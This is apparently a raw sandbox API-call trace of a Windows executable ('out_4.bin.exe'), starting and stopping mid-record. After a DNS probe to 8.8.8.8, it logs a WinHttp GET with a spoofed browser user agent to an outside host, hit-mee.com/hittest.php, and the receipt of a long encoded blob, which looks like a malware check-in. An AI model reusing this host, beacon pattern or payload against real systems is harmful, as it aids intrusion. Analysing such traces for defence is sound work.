¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp\x0bËYìù@", lpUsedDefaultChar=0x0) returned 256 [0054.953] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x80) returned 0x550168 [0054.953] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x40f7f8, nSize=0x105 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\out_4.bin.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\out_4.bin.exe")) returned 0x28 [0054.953] GetProcAddress (hModule=0x75130000, lpProcName="AreFileApisANSI") returned 0x751c4671 [0054.953] AreFileApisANSI () returned 1 [0054.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\kEecfMwgj\\Desktop\\out_4.bin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0054.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\kEecfMwgj\\Desktop\\out_4.bin.exe", cchWideChar=-1, lpMultiByteStr=0x1254e60, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\kEecfMwgj\\Desktop\\out_4.bin.exe", lpUsedDefaultChar=0x0) returned 41 [0054.954] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x31) returned 0x53f510 [0054.954] RtlInitializeSListHead (in: ListHead=0x1254a50 | out: ListHead=0x1254a50) [0054.954] GetLastError () returned 0x0 [0054.954] SetLastError (dwErrCode=0x0) [0054.954] GetEnvironmentStringsW () returned 0x5501f0* [0054.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1472, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1472 [0054.954] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x5c0) returned 0x550d78 [0054.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1472, lpMultiByteStr=0x550d78, cbMultiByte=1472, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1472 [0054.954] FreeEnvironmentStringsW (penv=0x5501f0) returned 1 [0054.954] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x98) returned 0x5501f0 [0054.954] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1f) returned 0x550060 [0054.954] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2b) returned 0x54d688 [0054.954] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x37) returned 0x54e700 [0054.954] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x3c) returned 0x542020 [0054.954] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x31) returned 0x550290 [0054.954] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x53f550 [0054.954] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x24) returned 0x54d048 [0054.954] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x14) returned 0x54e740 [0054.954] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xd) returned 0x5446e8 [0054.954] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1a) returned 0x550088 [0054.954] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2e) returned 0x54d6c0 [0054.954] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x19) returned 0x5500b0 [0054.955] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x17) returned 0x5502d0 [0054.955] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xe) returned 0x544700 [0054.955] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xce) returned 0x5502f0 [0054.955] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x3e) returned 0x542068 [0054.955] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1b) returned 0x5500d8 [0054.955] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1d) returned 0x550100 [0054.955] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x48) returned 0x5491a8 [0054.955] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x12) returned 0x5503c8 [0054.955] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x5503e8 [0054.955] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1b) returned 0x550128 [0054.955] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x24) returned 0x54d078 [0054.955] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x29) returned 0x54d6f8 [0054.955] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1e) returned 0x550420 [0054.955] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x6b) returned 0x550c08 [0054.955] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x17) returned 0x550c80 [0054.955] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xf) returned 0x544718 [0054.955] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x16) returned 0x550ca0 [0054.955] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2a) returned 0x54d730 [0054.955] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x29) returned 0x54d768 [0054.955] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x16) returned 0x550cc0 [0054.955] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x13) returned 0x550ce0 [0054.955] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x1f) returned 0x550448 [0054.955] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x12) returned 0x550d00 [0054.955] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x18) returned 0x550d20 [0054.955] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x46) returned 0x5491f8 [0054.956] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x550d78 | out: hHeap=0x530000) returned 1 [0054.956] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x800) returned 0x550d40 [0054.956] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0054.957] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1237a8f) returned 0x0 [0054.957] GetStartupInfoW (in: lpStartupInfo=0x40fa18 | out: lpStartupInfo=0x40fa18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\out_4.bin.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0054.957] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x551990 [0054.957] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x4) returned 0x54e760 [0054.957] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x64) returned 0x5519b0 [0054.957] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x64) returned 0x551a20 [0054.957] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x8) returned 0x551a90 [0054.957] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x551aa0 [0054.957] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x551ad8 [0054.957] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x551af8 [0054.957] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x551b18 [0054.957] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x551b38 [0054.957] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x551b58 [0054.957] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x551b78 [0054.957] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x8) returned 0x5522c0 [0054.957] GetProcessHeap () returned 0x530000 [0054.957] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x408) returned 0x5522d0 [0054.958] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5522d0 | out: hHeap=0x530000) returned 1 [0054.958] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5522c0 | out: hHeap=0x530000) returned 1 [0054.958] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x544730 [0054.958] GetProcessHeap () returned 0x530000 [0054.958] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x408) returned 0x5522c0 [0054.959] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5522c0 | out: hHeap=0x530000) returned 1 [0054.959] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544730 | out: hHeap=0x530000) returned 1 [0054.959] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x551b98 [0054.959] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x551bb8 [0054.959] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x4) returned 0x5522c0 [0054.959] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x40f310 | out: lpWSAData=0x40f310) returned 0 [0054.973] getaddrinfo (in: pNodeName="8.8.8.8", pServiceName="53", pHints=0x40f8a0*(ai_flags=0, ai_family=0, ai_socktype=2, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x40f8f4 | out: ppResult=0x40f8f4*=0x5506c8*(ai_flags=4, ai_family=2, ai_socktype=2, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x544748*(sa_family=2, sin_port=0x35, sin_addr="8.8.8.8"), ai_next=0x0)) returned 0 [0054.973] socket (af=2, type=2, protocol=0) returned 0xac [0054.986] setsockopt (s=0xac, level=65535, optname=4102, optval="\x10'", optlen=4) returned 0 [0054.986] sendto (s=0xac, buf=0x40f4a0*, len=29, flags=0, to=0x544748*(sa_family=2, sin_port=0x35, sin_addr="8.8.8.8"), tolen=16) returned 29 [0054.988] recvfrom (in: s=0xac, buf=0x40ef10, len=1024, flags=0, from=0x0, fromlen=0x0 | out: buf=0x40ef10*, from=0x0, fromlen=0x0) returned 58 [0055.015] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x20) returned 0x550948 [0055.015] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x551c18 [0055.015] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x20) returned 0x550970 [0055.016] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x550948 | out: hHeap=0x530000) returned 1 [0055.016] FreeAddrInfoW (pAddrInfo=0x5506c8*(ai_flags=4, ai_family=2, ai_socktype=2, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x544748*(sa_family=2, sin_port=0x35, sin_addr="8.8.8.8"), ai_next=0x0)) [0055.016] closesocket (s=0xac) returned 0 [0055.017] WSACleanup () returned 0 [0055.024] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x551bf8 [0055.024] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x20) returned 0x5506c8 [0055.025] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x550970 | out: hHeap=0x530000) returned 1 [0055.025] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x551c18 | out: hHeap=0x530000) returned 1 [0055.025] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x551bb8 | out: hHeap=0x530000) returned 1 [0055.025] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xd) returned 0x544730 [0055.025] lstrlenA (lpString="ft/gGGt4vm96E/jp") returned 16 [0055.025] GetProcessHeap () returned 0x530000 [0055.025] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x408) returned 0x557f10 [0055.026] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x557f10 | out: hHeap=0x530000) returned 1 [0055.027] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5519b0 | out: hHeap=0x530000) returned 1 [0055.027] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x551a20 | out: hHeap=0x530000) returned 1 [0055.028] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5506c8 | out: hHeap=0x530000) returned 1 [0055.028] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x551bf8 | out: hHeap=0x530000) returned 1 [0055.028] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x551b98 | out: hHeap=0x530000) returned 1 [0055.029] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xff) returned 0x557f10 [0055.029] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x49) returned 0x5522d0 [0055.029] GetProcessHeap () returned 0x530000 [0055.029] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x408) returned 0x558018 [0055.029] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x558018 | out: hHeap=0x530000) returned 1 [0055.029] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5522d0 | out: hHeap=0x530000) returned 1 [0055.029] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xff) returned 0x558018 [0055.029] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x544808 [0055.030] GetProcessHeap () returned 0x530000 [0055.030] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x408) returned 0x558120 [0055.030] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x558120 | out: hHeap=0x530000) returned 1 [0055.030] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544808 | out: hHeap=0x530000) returned 1 [0055.030] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x10) returned 0x544808 [0055.030] LoadLibraryExW (lpLibFileName="api-ms-win-security-systemfunctions-l1-1-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0055.030] GetLastError () returned 0x7e [0055.030] LoadLibraryExW (lpLibFileName="advapi32", hFile=0x0, dwFlags=0x800) returned 0x75910000 [0055.031] GetProcAddress (hModule=0x75910000, lpProcName="SystemFunction036") returned 0x75911919 [0055.031] SystemFunction036 (in: RandomBuffer=0x40e5ac, RandomBufferLength=0x4 | out: RandomBuffer=0x40e5ac) returned 1 [0055.031] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x92) returned 0x5519b0 [0055.031] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x551b98 [0055.031] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x46) returned 0x549248 [0055.032] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x5587a8 [0055.090] WinHttpSetTimeouts (hInternet=0x5587a8, nResolveTimeout=180000, nConnectTimeout=180000, nSendTimeout=180000, nReceiveTimeout=180000) returned 1 [0055.091] WinHttpConnect (hSession=0x5587a8, pswzServerName="hit-mee.com", nServerPort=0x50, dwReserved=0x0) returned 0x5650d0 [0055.098] WinHttpOpenRequest (hConnect=0x5650d0, pwszVerb="GET", pwszObjectName="hittest.php?a=aiJhJyP8V6InMrv&id=0", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x565210 [0055.099] WinHttpSendRequest (hRequest=0x565210, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1 [0059.434] WinHttpReceiveResponse (hRequest=0x565210, lpReserved=0x0) returned 1 [0059.436] WinHttpQueryDataAvailable (in: hRequest=0x565210, lpdwNumberOfBytesAvailable=0x40f954 | out: lpdwNumberOfBytesAvailable=0x40f954*=0x834) returned 1 [0059.436] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x834) returned 0x572b80 [0059.437] WinHttpReadData (in: hRequest=0x565210, lpBuffer=0x572b80, dwNumberOfBytesToRead=0x834, lpdwNumberOfBytesRead=0x40f94c | out: lpBuffer=0x572b80*, lpdwNumberOfBytesRead=0x40f94c*=0x834) returned 1 [0059.438] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x834) returned 0x5733c0 [0059.438] WinHttpQueryDataAvailable (in: hRequest=0x565210, lpdwNumberOfBytesAvailable=0x40f954 | out: lpdwNumberOfBytesAvailable=0x40f954*=0x0) returned 1 [0059.438] WinHttpCloseHandle (hInternet=0x5587a8) returned 1 [0059.439] WinHttpCloseHandle (hInternet=0x5650d0) returned 1 [0059.439] WinHttpCloseHandle (hInternet=0x565210) returned 1 [0059.439] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x835) returned 0x56a730 [0059.439] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5733c0 | out: hHeap=0x530000) returned 1 [0059.439] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x627) returned 0x5733c0 [0059.439] lstrlenA (lpString="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") returned 2100 [0059.439] GetProcessHeap () returned 0x530000 [0059.439] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x408) returned 0x5650d0 [0059.440] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5650d0 | out: hHeap=0x530000) returned 1 [0059.440] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x3c) returned 0x542188 [0059.440] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x28) returned 0x567520 [0059.440] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x55d1f0 [0059.440] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x55d1d8 [0059.440] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x55d340 [0059.440] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x55d370 [0059.440] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x551eb8 [0059.440] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x55d298 [0059.440] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x55d388 [0059.440] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x5) returned 0x555ee0 [0059.440] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x55d3d0 [0059.440] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x24) returned 0x567550 [0059.440] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x56f9f0 [0059.440] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x551ed8 [0059.440] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x56f9d8 [0059.440] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x56f9c0 [0059.441] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x6) returned 0x555ed0 [0059.441] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x56fa80 [0059.441] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x2) returned 0x555ec0 [0059.441] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x56fa98 [0059.441] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x551ef8 [0059.441] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x56fa68 [0059.441] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x56fa50 [0059.441] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xa) returned 0x56fab0 [0059.441] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x56fac8 [0059.441] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x4) returned 0x555eb0 [0059.441] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x56fae0 [0059.441] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x551ff8 [0059.441] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x56faf8 [0059.441] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x56fb10 [0059.441] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xb) returned 0x56fb28 [0059.441] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x56fb40 [0059.441] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x6) returned 0x555ef0 [0059.441] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x56fb58 [0059.441] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x551f98 [0059.441] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x56fb70 [0059.441] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x56fb88 [0059.441] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x4) returned 0x555f30 [0059.441] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x56fba0 [0059.441] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x6) returned 0x555f40 [0059.441] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x56fbb8 [0059.441] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x551fd8 [0059.442] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x56fbd0 [0059.442] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x56fbe8 [0059.442] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x5) returned 0x555f50 [0059.442] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x56fc00 [0059.442] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x6) 